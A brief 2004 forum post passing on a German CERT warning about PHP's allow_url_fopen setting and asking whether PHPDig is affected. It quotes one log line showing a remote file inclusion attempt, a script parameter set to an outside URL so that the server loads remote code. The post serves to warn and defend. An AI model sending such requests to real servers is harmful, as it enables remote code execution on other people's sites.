PDA

View Full Version : Security Risk: allow_url_fopen = ON


Rolandks
10-07-2004, 07:32 AM
The German CERTs (Computer Emergency Response Teams) reports a Security Risk if in php.ini: allow_url_fopen = ON.
Scripts who allow to load URL as parameter can use as attack. Many attacks started last weeks to all servers.

In log-Files you found f. ex.:
[28/Sep/2004:18:03:07 +0200] "GET
/path/to/script.php?variablenname=http://192.168.1.2:4213/ HTTP/1.0" 200 15183 "-" "Wget/1.8.1"

Link to message for German User:
http://www.heise.de/security/news/meldung/51838

Any secure risk for phpdig ?

Roland